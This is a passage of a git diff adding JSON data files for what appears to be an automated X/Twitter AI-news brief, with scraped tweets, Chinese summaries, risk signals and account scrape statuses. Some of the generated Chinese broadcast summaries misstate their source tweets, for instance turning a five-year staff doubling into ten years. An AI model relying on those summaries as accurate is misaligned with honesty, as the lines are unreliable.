"title": "AI研究突破", + "subtitle": "Karpathy Software 3.0 + Anthropic生物Bench", + "level": "P1", + "items": [] + }, + { + "id": "c5", + "title": "开源与生态", + "subtitle": "LeCun再杠开源限制", + "level": "P2", + "items": [ + { + "text": "匿名实验:Claude Code对含特定关键词的仓库报错\"out of extra usage\"", + "url": "https://x.com/runes_leo/status/2050127414630469937" + } + ] + }, + { + "id": "c6", + "title": "华语圈热点", + "subtitle": "中文博主实操分享", + "level": "P2", + "items": [ + { + "text": "铁锤人:Apple Support App用Claude Code打包", + "url": "https://x.com/lxfater/status/2050240636020732015" + }, + { + "text": "0xAA:Cursor额度$150已用光,正在找循环任务消耗剩余$10000额度", + "url": "https://x.com/0xAA_Science/status/2050244250563182801" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "MID", + "title": "Gary Marcus:AI对齐尚未解决,大规模部署风险极高", + "detail": "Marcus认为从LLM获取真正对齐是痴心妄想,在没有健壮解决方案的情况下大规模部署LLM极其危险", + "url": "https://x.com/GaryMarcus/status/2050296366161940584" + }, + { + "id": "r2", + "level": "MID", + "title": "Gary Marcus:AI对GDP的贡献类似\"挖坑填坑\"", + "detail": "引用David Sacks观点:付钱让人挖坑再填回去GDP也会涨,AI当前对GDP的贡献可能同样没有真正价值", + "url": "https://x.com/GaryMarcus/status/2050284439343862266" + }, + { + "id": "r3", + "level": "OPP", + "title": "用户隐私争议再起", + "detail": "Gary Marcus:Meta就是Black Mirror的化身,用户隐私问题持续引发担忧", + "url": "https://x.com/GaryMarcus/status/2050275183223857462" + } + ] + } +} \ No newline at end of file diff --git a/data/x_brief/debug/20260502_034436_l2_input.json b/data/x_brief/debug/20260502_034436_l2_input.json new file mode 100644 index 0000000..ef5a609 --- /dev/null +++ b/data/x_brief/debug/20260502_034436_l2_input.json @@ -0,0 +1,56 @@ +{ + "target_indexes": [ + 13, + 278, + 43, + 314, + 174, + 111, + 100 + ], + "target_count": 7, + "targets": [ + { + "idx": 13, + "handle": "sama", + "url": "https://x.com/sama/status/2050274547061129577", + "title": "you know what\n\nall of these \"which is better\" polls are silly\n\nuse codex or claude code, whatever works best for you\n\ni am grateful we live in a time with such amazing tools, and grateful there is a choice" + }, + { + "idx": 278, + "handle": "sama", + "url": "https://x.com/sama/status/2049653810558353746", + "title": "GPT-5.5 is going to have a party for itself. it chose 5/5 at 5:55 pm for the date and time. \n\nif you'd like to come, let us know here: https://luma.com/5.5\n\ncodex will help the team pick people from the replies. 5.5 had some good ideas/requests for the party, which we'll do." + }, + { + "idx": 43, + "handle": "Pluvio9yte", + "url": "https://x.com/Pluvio9yte/status/2050221337424408733", + "title": "Sam Altman 在和 Stripe 联合创始人 Patrick Collison 的访谈里亲口承认:OpenAI 没有护城河,而且永远不会有。\n\n这话从地球上估值最高的私人公司 CEO嘴里说出来,确实值得认真看一下。\n\n以下是几个核心信息:\n\n1. Sam 说希望 OpenAI 做一个\"forever low margin\"(永远低利润率)的公司,类比 utility company(公用事业公司,简单说就是水电煤那种)。只要业务足够大、增速足够快,利润率低他不在乎。\n\n2. 他说 AI 的 switching costs(切换成本)正在崩塌。还拿 Codex 举例——用户从竞品切过来很容易。更有意思的是他的推论:AI越聪明,切换越容易,因为你直接让 Agent 帮你迁移就行了。\n\n3. OpenAI 正在建\"人类历史上最贵的基础设施\"——万亿美元级数据中心,能源合约跨度20年。但5年后员工数只想翻倍。翻译成人话:他赌 AI Agent能干掉大部分工程和运维岗位。\n\n4. OpenAI 计划派工程师驻场到企业 CEO 身边,帮 CEO 自动化日常决策和工作流。理论是:先搞定 CEO,效果会像分形一样向下扩散到整个组织。举了 Shopify CEO Tobi Lutke 的例子——Tobi 自己先上手折腾 AI 自动化,然后逼着全公司跟进。\n\n5. GPT-5.5 开始表现出\"偏好\"——Sam 给 Agent 一张信用卡买20美元以下的东西,它选了 Gumroad 上一个 HTML 设计。GPT-5.5还要求办生日派对,指定5月5日,说不想自己致辞,要构建它的工程师来致辞。Sam 说他感到\"real moral pressure\"(真正的道德压力)。" + }, + { + "idx": 314, + "handle": "cursor_ai", + "url": "https://x.com/cursor_ai/status/2049499866217185492", + "title": "We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor.\n\nRun agents from CI/CD pipelines, create automations for end-to-end workflows, or embed agents directly inside your products." + }, + { + "idx": 174, + "handle": "cursor_ai", + "url": "https://x.com/cursor_ai/status/2049926283061035254", + "title": "Cursor Security Review is now available for Teams and Enterprise plans.\n\nRun two types of always-on agents:\n1. Security Reviewer checks every PR for vulnerabilities and leaves comments.\n2. Vulnerability Scanner runs scheduled scans of your codebase and posts findings in Slack." + }, + { + "idx": 111, + "handle": "Pluvio9yte", + "url": "https://x.com/Pluvio9yte/status/2050059618043543563", + "title": "卧槽,看完 Andrej Karpathy 在 Sequoia AI Ascent 2026 的最新访谈,我直接破防了🤯\n\n他说:最近几个月,他作为程序员从来没有感觉这么“behind”过……不,是突然之间,他发现自己再也不落后了。12月前后,agentic tools 突然从“偶尔靠谱”变成了“离谱地靠谱”。\n\nKarpathy说了三个阶段:\nSoftware 1.0:你写显式规则\nSoftware 2.0:你调数据+训练网络\nSoftware 3.0:你给 Context + Prompt,让 LLM 自己去当那个智能解释器\n\n举两个他亲身实验的狠例子:\nOpenClaw 安装:以前是写一堆复杂 shell script 去适配各种平台。现在?直接扔一句 prompt 给 agent,它自己看环境、debug、搞定全部。你编程的对象从“代码”变成了“一段描述”。\n\nMenu Gen:以前他还老老实实写 Vercel App、OCR、调用图像生成器……结果 Gemini 直接吃照片、用 prompt 就把菜单重绘+图片叠加上去了。整个 App 都没必要存在了!\n\n他还区分了两个词:\nVibe Coding:把地板拉高,所有人都能随便搞东西,太爽了\nAgentic Engineering:把天花板继续拔高,专业软件的质量不能因为“vibe”而掉,你得学会 harness 这些技能,让它们又快又稳\n\nAI 加快了技术平权,编程从职业开始变成每个人都能拥有的超级能力。" + }, + { + "idx": 100, + "handle": "runes_leo", + "url": "https://x.com/runes_leo/status/2050096487967695197", + "title": "Karpathy 这场 Sequoia 演讲把 AI 编程下个阶段讲透了,最有感触的是第 6 条。\n\n1. Software 3.0 来了。\n1.0 写代码,2.0 训神经网络,3.0 在 LLM 的 context 里用自然语言\"编程\"。\n\n2. 2025-12 是拐点。\n生成代码块变大变连贯,编程的最小单位从\"写代码\"升级到\"委派任务\"。\n\n3. 神经网络会成主计算层。\n未来不是 CPU 上跑神经网络,是神经网络当主进程,传统计算变辅助。\n\n4. 许多应用会消失。\n用户不需应用,直接拿模型输出。MenuGen 那种轻量工具最先被替代。\n\n5. 验证性决定进展速度。\n数学、代码这种可结算的领域 AI 飞快。模糊任务仍是\"锯齿智能\"。\n\n6. 新的 10x 工程师不是会写代码的人。\n是会做这五件事的人——\n\n规范 / 监督 / 审查 / 评估 / 权限管理。\n\n没一件是写代码本身。\n\n7. 它们是鬼,不是动物。\nLLM 是统计模拟物,盲信和盲拒都不对,要实证理解它的边界。\n\n最强金句:\n\n> 你可以外包思考。\n> 但不能外包理解。\n\n---\n\n跑了半年策略,第 6 条最有体感。\n\n写新策略丢 prompt 给 Claude Code 就有了。\n真正花时间的是规范怎么写、跑出来怎么审、上线前权限怎么收。\n\n代码量从 0 到 1 的那段不再是瓶颈。\n从 1 到能信任的那段才是。\n\n---\n\n鬼,不是动物。\n盲信和盲拒都不对。" + } + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260502_034436_l2_output.json b/data/x_brief/debug/20260502_034436_l2_output.json new file mode 100644 index 0000000..505e3f8 --- /dev/null +++ b/data/x_brief/debug/20260502_034436_l2_output.json @@ -0,0 +1,20 @@ +{ + "target_indexes": [ + 13, + 278, + 43, + 314, + 174, + 111, + 100 + ], + "broadcast_zh": [ + "多位开发者呼吁理性看待AI工具选择,认为直接使用实证性工具更有效率,行业竞争将推动生态多元化", + "OpenAI将在5月5日17:55举办模型派对,以Codex筛选嘉宾并采纳用户创意,暗示持续强化社区参与与迭代模式", + "Sam Altman明确OpenAI将构建万亿级AI基础设施,但员工规模十年内仅扩大两倍,预示AI代理将取代高度工程化岗位", + "Cursor推出安全审查功能,通过AI代理提供代码漏洞检测与日程扫描服务,拓展企业级开发安全管理场景", + "Andrej Karpathy指出AI编程进入3.0时代,开发者从写代码转向任务描述,神经网络将成为计算核心架构", + "Karpathy预测2025年12月为AI编程拐点,具备验证性的业务场景将加速应用消失,催生新型工程师人才需求", + "专家强调LLM本质为统计模型,需通过安全边界测试验证其可靠性,开发决策中平衡模型应用与人类认知边界" + ] +} \ No newline at end of file diff --git a/data/x_brief/history/20260427_134052.json b/data/x_brief/history/20260427_134052.json new file mode 100644 index 0000000..971503c --- /dev/null +++ b/data/x_brief/history/20260427_134052.json @@ -0,0 +1,2938 @@ +{ + "generated_at": "2026-04-27T13:39:25.780249+00:00", + "period": { + "days": 30, + "start_utc": "2026-03-28T13:38:41.738606+00:00", + "end_utc": "2026-04-27T13:39:25.780249+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 33, + "active_accounts": 17, + "total_tweets": 286, + "failed_accounts": 5 + }, + "accounts": [ + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "andrejkarpathy", + "account": "@andrejkarpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 14, + "error": "" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 22, + "error": "" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "" + }, + { + "handle": "lmsqueegie", + "account": "@lmsqueegie", + "name": "Lars Nielsen", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "david__tian", + "account": "@david__tian", + "name": "David Tian", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "Bitking_", + "account": "@Bitking_", + "name": "BTCKing", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 7, + "error": "" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "Altcoin Buzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "TradingGods", + "account": "@TradingGods", + "name": "Trading Gods", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "Warrior_Trading", + "account": "@Warrior_Trading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "ProfTrading", + "account": "@ProfTrading", + "name": "Profitable Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "" + }, + { + "handle": "直播带逛Tommy", + "account": "@直播带逛Tommy", + "name": "Tommy", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 5, + "error": "" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 9, + "error": "" + }, + { + "handle": "MikeAI", + "account": "@MikeAI", + "name": "Michael", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 14, + "error": "" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "王川", + "account": "@王川", + "name": "王川", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "老胡", + "account": "@老胡", + "name": "老胡", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "比特币超级玩家", + "account": "@比特币超级玩家", + "name": "超级玩家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + } + ], + "tweets": [ + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system prompts and guardrails would save him. They didn’t. \n\nIn this case he lost data. Eventually people will lose lives.", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827#m", + "published_at": "2026-04-27T13:32:43+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://nitter.net/HarryStebbings/status/2048756619622707452#m", + "published_at": "2026-04-27T13:30:16+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://nitter.net/soumithchintala/status/2048756358820827564#m", + "published_at": "2026-04-27T13:29:14+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://nitter.net/sama/status/2048755148361707946#m", + "published_at": "2026-04-27T13:24:26+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials\nvia @IlirAliu_\n \n#Robotics #ArtificialIntelligence #ML #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m", + "published_at": "2026-04-27T13:11:07+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://nitter.net/sama/status/2048751392031203544#m", + "published_at": "2026-04-27T13:09:30+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My view is simple:\n\nThe winners in enterprise AI will not be the companies with access to the most models.\n\nThey will be the ones that build the best intelligent systems around them.\n\nIf you want the full breakdown, watch the video and tell me what part of your AI stack you are rethinking first.\n\nWhat do you think becomes the real source of advantage in the next 12 months, the model itself, or the orchestration layer around it?\n\nCheck out the full article: https://www.linkedin.com/pulse/agentic-ai-reshaping-enterprise-strategy-faster-than-you-van-loon-9rfme", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m", + "published_at": "2026-04-27T13:00:20+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: The second misconception I keep seeing:\n\nToo many teams think they have to choose between open models and proprietary models.\n\nThey do not.\n\nThe smarter path is hybrid.\n\n→ proprietary models for scale and broad capability\n→ open models for flexibility and control\n→ orchestration layers to route each task to the best-fit model in real time\n\nThat is how you balance performance, cost, and governance without locking yourself into one lane.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m", + "published_at": "2026-04-27T13:00:20+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My biggest takeaway:\n\nModels are becoming components, not products.\n\nWhat matters now is the system around them:\n\n→ runtimes\n→ memory\n→ tool access\n→ orchestration\n→ secure execution environments\n\nThat is what turns a model into an agent, and an agent into something the business can actually deploy across functions.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m", + "published_at": "2026-04-27T13:00:19+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Most enterprise AI strategies are already behind.\n\nNot because they picked the wrong model, but because they are still thinking at the model layer.\n\nThe real shift is happening one level up, where AI becomes a system that can reason, use tools, retain context, and execute work inside secure environments.\n\nThat changes enterprise strategy faster than most leaders realize.\n\nA thread, with insights from my latest video with NVIDIA…\n\n#NVIDIAPartner #NVIDIAGTC", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m", + "published_at": "2026-04-27T13:00:18+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain\nby @spaceandtech_\n\n#Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m", + "published_at": "2026-04-27T12:50:08+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", + "url": "https://nitter.net/GaryMarcus/status/2048746152749846549#m", + "published_at": "2026-04-27T12:48:41+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactly why* we still need software engineers — and why what Dario recently said about software engineers disappearing is so absurd.\n\nSkilled coders can use vibe-coded tools, with careful oversight.\n\nBut amateurs using vibe-coding tools are asking for trouble. \n\nUsing them without a strong prior working knowledge in coding and sysadmin *is* the mistake.", + "url": "https://nitter.net/GaryMarcus/status/2048742983684784239#m", + "published_at": "2026-04-27T12:36:05+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Vibe coded disasters piling up on Reddit”", + "url": "https://nitter.net/GaryMarcus/status/2048739005525877072#m", + "published_at": "2026-04-27T12:20:17+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being\nvia @XRoboHub\n\n#Robots #ArtificialIntelligence #Innovation #Technology #Tech", + "url": "https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m", + "published_at": "2026-04-27T12:18:17+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence\nby @CyberRobooo\n \n#Robot #Engineering #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m", + "published_at": "2026-04-27T11:20:17+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "You’re about to feel the #AI money squeeze\nby Hayden Field @verge\n\nLearn more: https://bit.ly/3QwH0fu\n\n#ArtificialIntelligence #MachineLearning #ML", + "url": "https://nitter.net/Ronald_vanLoon/status/2048717799531397534#m", + "published_at": "2026-04-27T10:56:01+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Shape-Shifting All-Terrain #Robot Combines Legs, Wheels, and Aerial #Drone Power\nby @XueJia24682\n\n#Robotics #EmergingTech #Technology #Innovation", + "url": "https://nitter.net/Ronald_vanLoon/status/2048716491537650168#m", + "published_at": "2026-04-27T10:50:49+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Pizza Goes Underwater: Domino’s UK Trials Submarine Delivery\nby @IntEngineering\n \n#Innovation #EmergingTech #Tech #Technology #TechForGood", + "url": "https://nitter.net/Ronald_vanLoon/status/2048708277739876755#m", + "published_at": "2026-04-27T10:18:11+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://nitter.net/paulg/status/2048704073356935676#m", + "published_at": "2026-04-27T10:01:28+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://nitter.net/paulg/status/2048701354672050286#m", + "published_at": "2026-04-27T09:50:40+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Tiny Pacemaker, Big Impact: A Breakthrough in Cardiac Care\nby @pascal_bornet\n\n#HealthTech #Innovation #EmergingTech #TechForGood #Tech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048699478094315671#m", + "published_at": "2026-04-27T09:43:13+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "This Smart Trash Can Tracks and Catches Thrown Garbage Automatically\nby @IamKyros69\n \n#EmergingTech #Innovation #TechForGood #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048693406138851388#m", + "published_at": "2026-04-27T09:19:05+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Is it time to worry about compute scarcity?\nby @antgrasso\n\n#ArtificialIntelligence #IT #Tech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048684842036978024#m", + "published_at": "2026-04-27T08:45:03+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Real-Life Beetle Bot: Six-Legged Walking #Robot in Action\nvia @ZappyZappy7\n\n#Robotics #MachineLearning #ArtificialIntelligence #ML #MI", + "url": "https://nitter.net/Ronald_vanLoon/status/2048680331864100997#m", + "published_at": "2026-04-27T08:27:08+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://nitter.net/paulg/status/2048677984106664227#m", + "published_at": "2026-04-27T08:17:48+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://nitter.net/jasonfreedman/status/2048615296613937201#m", + "published_at": "2026-04-27T04:08:42+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", + "url": "https://nitter.net/atmoio/status/2048608025464705084#m", + "published_at": "2026-04-27T03:39:49+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀.", + "url": "https://nitter.net/GaryMarcus/status/2048593283639894520#m", + "published_at": "2026-04-27T02:41:14+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close.", + "url": 